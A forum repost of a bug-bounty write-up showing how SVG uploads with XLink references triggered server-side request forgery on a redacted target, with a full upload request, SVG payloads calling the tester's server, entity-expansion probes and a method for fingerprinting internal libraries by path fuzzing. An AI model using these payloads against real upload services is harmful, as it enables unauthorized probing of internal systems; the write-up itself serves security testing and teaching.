Jump to content
Nytro

SVG XLink SSRF fingerprinting libraries version

Recommended Posts

SVG XLink SSRF fingerprinting libraries version

Mar 2

  • SSRF(Server-side-request-forgery) have been quite a popular attack surface for the uploading functionality where application fetches the assets from external resources in form of images,documents etc
  • SVG is an XML based vector image used to display a variety of graphics on the Web and other environments, due it ’s XML structure it supports various XML features, one of the feature is XLink which is responsible for creating internal and external links within XML document.

During the testing process, I encountered with XLINK based SSRF to enumerate various internal libraries, installed tools, gnome version’s, much more etc,


POST /upload HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 1313
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://redacted.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN
Referer: https://redacted.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="timestamp"
1551244304
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="api_key"
413781391468673
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="30" width="30" xlink:href="http://myserver:1337/" /></svg>
  • Incoming Request at my server: Interestingly referer header shows the request has been generated from an internal network of the application which is hosting app over port 3000
 
1*gPmHW934O148NuxKOoVSwg.png
  • Since the application is accepting SVG based images, the second try would be to include the static entities to see if the parser is allowing custom entities.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ <!ENTITY xml "POC for Static Entities Allowed">]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="0" y="20" font-size="20">&xml;</text>
</svg>
 
1*Zg0XsywN0BlV_8XvnDRLkQ.png
  • As parser is allowing static entities, Next step would be to include SYSTEM based entities along with DTD to fetch the malicious DTD which is more like XXE attack but parser was blocking system based entities in the backend, they had strong validation of the malicious malformed XML.

Since parser is blocking SYSTEM based entities our attack surface has been limited, Now it’s time to test Billion Laughs attack since application allowed static entities. Always note that: Before blinding fuzzing the various XML payloads, make sure to understand the parser logic, Before trying the billion laugh attack, I threw the server with simple callback entity function to see if the parser allows rendering of xml1 entity through callback of xml2 entity.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ 
<!ENTITY xml1 "This is my first message">
<!ENTITY xml2 "&xml1";>
]>
<text x="0" y="20" font-size="20">&xml2;</text>
</svg>
  • Unfortunately, the parser is blocking the callback entities as well. Now our attack surface is at ground level (Picture present fingerprint trick) by including the internal path along with picture present in system & we get interaction if that picture present internally on the system as described by @flyod at https://hackerone.com/reports/223203

  • In order to enumerate all possible things, we need to build a wordlist for all possible local pictures present on the system.
 
1*d36INp5JvKwBK3WH3FoqIw.png
 
1*6pMM1E1-LJzyMUf4Ot1Hgg.png
 
1*6Pg5QZDkMwCoLnwfHCIlBw.png
  • Now it’s time to make different port’s open or just with different paths& fuzz it along with all the internal picture path’s collected to fingerprint all possible libraries, script, tools installed along with versions.

 

Go to the profile of Arbaz Hussain

Arbaz Hussain

~Kiraak-Boy~

 

Sursa: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...